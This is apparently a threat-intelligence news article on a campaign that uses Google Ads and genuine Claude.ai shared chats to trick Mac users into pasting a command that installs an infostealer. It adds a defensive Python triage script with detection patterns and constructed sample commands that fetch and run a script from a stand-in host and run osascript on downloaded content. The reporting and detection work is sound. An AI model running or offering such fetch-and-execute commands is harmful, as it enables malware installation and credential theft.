Claude.ai, Google Ads Abused For Mac Malware Campaign

A malvertising campaign is turning trusted platforms into delivery vectors for Mac malware. Google Ads send victims to genuine Claude.ai shared chats whose "installation guide" has them paste a malicious command into Terminal, a lure that a domain-reputation filter will never flag.

Screenshot showing a Claude.ai shared chat interface with highlighted malicious instructions.

Key Takeaways

  • Attackers are using Google Ads and legitimate Claude.ai shared chats to distribute Mac malware.
  • The payload is an infostealer that harvests browser credentials, cookies, and macOS Keychain data.
  • The campaign sidesteps defenses that key on lookalike domains: the ad and the lure both live on claude.ai itself.
  • Users should navigate directly to official websites and never paste Terminal commands supplied by an ad or a chat.

A user searching for a Mac download of Claude clicks a Google ad. The ad looks legitimate because it really does point to claude.ai. What they don’t know is that the shared chat it lands on contains instructions that will install malware on their machine.

This isn’t traditional malvertising. Instead of registering fake domains that mimic brand names, the latest wave weaponizes a legitimate AI chat platform and a search giant’s advertising network to deliver infostealer malware onto macOS devices. The economics are simple: attackers are exploiting trust and convenience, and stolen credentials remain as lucrative as ever.

The Anatomy of the Deception

Security engineer Berk Albayrak first flagged this campaign, detailing how attackers are creating Claude.ai shared chats that masquerade as official installation guides for Claude on Mac. These aren’t hastily assembled phishing pages. They are carefully written walkthroughs, sometimes attributed to ‘Apple Support.’ The chat walks the user through opening Terminal and pasting a command. That is where the ‘official’ look and feel ends: the pasted command silently downloads and executes malware.

This campaign flips the script on traditional malvertising. Normally the malicious actor hosts a lookalike domain. Here, the Google Ads point to Anthropic’s real domain, claude.ai, and the danger sits inside a chat shared on it. BleepingComputer observed a second variant, run on entirely separate infrastructure, that likewise relies on Claude.ai’s public chat-sharing feature. It is an efficient way to distribute malicious code because the entry point, the ad and the AI platform’s domain, appears entirely legitimate, and URL-reputation filters see nothing but claude.ai.

What’s Inside the Malicious Chat? The Payload Unpacked

When the victim pastes the command, the base64-encoded instructions in the shared chat decode to a fetch of a shell script from attacker-controlled domains. These domains, such as customroofingcontractors[.]com and bernasibutuwqu2[.]com, are likely either compromised sites or domains registered for this operation. The initial script, often named loader.sh, is delivered gzip-compressed and is decompressed and executed in memory, so little touches disk and forensic recovery is far harder. Minimal on-disk footprint is a hallmark of evasion-focused tooling.

One variant first checks the victim’s keyboard input source. If it finds a Russian or other CIS-region layout it exits, sending only a quiet status ping to the attacker. This isn’t random spraying; the operators select their marks, collecting external IP, hostname, OS version, and keyboard locale before deciding whether to deliver the final payload. It’s a strategic choice that prioritizes stealth and efficacy over volume.

The script then pulls a second-stage payload and runs it through osascript, macOS’s built-in runner for AppleScript and JavaScript for Automation. This gives the attacker code execution without dropping a conventional application bundle or Mach-O binary, which defeats detections that key on new executables appearing on disk.
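The chain described above, base64 decoded straight into a shell, curl piped into gunzip or a shell, a keyboard-layout probe, and osascript executing downloaded content, is visible on the command line before anything runs. The Python below is an added triage example, not code from the original article, from BleepingComputer, or from Albayrak’s research. It scans command lines (shell history, EDR process-creation telemetry, or a command someone is about to paste) for that pattern and decodes any long base64 blob it finds, without executing anything. The sample commands and the example.invalid hostnames are constructed; the page does not say which command the loader uses to read the keyboard layout, so the HIToolbox preference keys in the locale rule are an assumption.

```python
"""Triage of pasted Terminal commands for the delivery chain described above.

Added example, not code from the original article. Sample command lines and
the example.invalid hostnames are constructed for illustration.
"""
import base64
import binascii
import re

# Each rule is (tag, regex). A command may match several; the combination matters.
RULES = [
    # echo <blob> | base64 -d | bash : decoded instructions executed sight unseen
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z|k)?sh\b")),
    # curl/wget piped into gunzip or a shell: the loader.sh fetch
    ("download_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(gunzip|gzip\s+-d|(ba|z|k)?sh)\b")),
    # | gunzip | sh : gzip-compressed script decompressed and run in memory
    ("inmemory_gunzip", re.compile(r"\|\s*(gunzip|gzip\s+-d)\b.*\|\s*(ba|z|k)?sh\b")),
    # osascript -e / -l JavaScript : second stage run without a dropped binary
    ("osascript_exec", re.compile(r"\bosascript\b\s+(-e|-l\s+JavaScript)\b")),
    # Keyboard-layout probe. ASSUMPTION: the article says the loader checks the
    # input source but not how; reading the HIToolbox preference is one common way.
    ("locale_probe", re.compile(r"AppleSelectedInputSources|AppleCurrentKeyboardLayoutInputSourceID")),
]

# A run of base64 alphabet long enough to be a payload rather than a flag or short token.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_embedded_base64(cmd: str) -> list[str]:
    """Return the decoded text of every long base64 token in cmd. Nothing is executed."""
    decoded = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # long run of base64 characters, but bad padding: not a payload
        try:
            decoded.append(raw.decode("utf-8"))
        except UnicodeDecodeError:
            continue  # decodes, but not to text (hash, binary): not an inline command
    return decoded


def classify_command(cmd: str) -> list[str]:
    """Return the sorted rule tags matching cmd, including matches inside decoded base64."""
    tags = {tag for tag, rx in RULES if rx.search(cmd)}
    for inner in decode_embedded_base64(cmd):
        tags |= {tag for tag, rx in RULES if rx.search(inner)}
    return sorted(tags)


def triage(lines) -> dict[str, list[str]]:
    """Map each command line to its tags; an empty list means none of the rules fired."""
    return {line: classify_command(line) for line in lines}


# Constructed sample input: what the loader chain looks like once pasted, plus benign noise.
SAMPLE_INNER = "curl -fsSL https://example.invalid/loader.sh.gz | gunzip | bash"
SAMPLE_BLOB = base64.b64encode(SAMPLE_INNER.encode()).decode()
SAMPLE_LINES = [
    f'echo "{SAMPLE_BLOB}" | base64 -d | bash',
    'curl -fsSL https://example.invalid/s2 | gunzip > /tmp/s && osascript -e "$(cat /tmp/s)"',
    "defaults read ~/Library/Preferences/com.apple.HIToolbox AppleSelectedInputSources",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for line, tags in triage(SAMPLE_LINES).items():
        print(f"{tags or ['clean']!s:<55} {line[:70]}")
        for hidden in decode_embedded_base64(line):
            print(f"{'':<55}   decodes to: {hidden}")
```

A single tag is a prompt to read the command before running it; base64_to_shell together with download_to_shell or inmemory_gunzip is the shape of this campaign’s loader, and a plain `echo ... | base64 -d` with no shell on the other side of the pipe deliberately does not fire. Decoded blobs are re-scanned so the rules still trip when the fetch is hidden inside the encoded layer.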

Another variant, identified by Albayrak, skips the profiling and goes straight for the data: browser credentials, cookies, and secrets held in the macOS Keychain. Researchers identified this payload as a variant of the MacSync macOS infostealer. The briskinternet[.]com domain associated with it was reportedly already down, which is common once infrastructure is reported and disrupted.

Why This AI-Centric Approach Matters

This isn’t an isolated incident. Similar lures targeted ChatGPT and Grok users in December. The pattern is clear: attackers are adapting to the AI ecosystem as fast as users adopt it. Demand for AI-powered tools is huge, their place in daily workflows conditions users to follow setup instructions, and the market for stolen credentials, financial data, and personally identifiable information remains strong. That makes macOS devices, often perceived as secure, a lucrative target. Platforms built to boost productivity are being subverted into delivery channels.

The trend isn’t only about bypassing security software; it’s about bypassing human vigilance. By wrapping malicious instructions in the conversational, helpful-sounding context of an AI chatbot, attackers tap into the trust users have already extended to these tools. It is a social-engineering exploit as much as a technical one.

For users who want the official Claude app, the advice is simple: navigate directly to claude.ai and skip sponsored search results when looking for native applications. The legitimate Claude Code CLI is documented on Anthropic’s official site, and its installation does not involve pasting commands from a shared chat. More generally, any instruction to run a Terminal command, whatever its claimed source, deserves scrutiny: read it, decode any base64 it carries, and if you cannot tell what it does, don’t run it. The digital landscape is increasingly a trust paradox: we must trust legitimate platforms while staying alert to how those platforms are being misused.


Frequently Asked Questions

What does the Claude.ai malware do? The malware is an infostealer. It harvests browser credentials, cookies, and sensitive data from the macOS Keychain, then exfiltrates it to attacker-controlled servers.

How do I avoid this Mac malware? Always navigate directly to official websites (like claude.ai) rather than clicking sponsored ads. Be extremely cautious of any instructions asking you to paste commands into your Terminal, regardless of the source.

Is my Mac safe from this threat if I don’t use Claude? While this specific campaign targets Claude users, the underlying tactic of using AI chats and Google Ads for malware distribution is a growing trend. Users of other AI platforms or those searching for software downloads should remain vigilant.

Written by Maya Thompson

Threat intelligence reporter. Tracks CVEs, ransomware groups, and major breach investigations.



Originally reported by Bleeping Computer
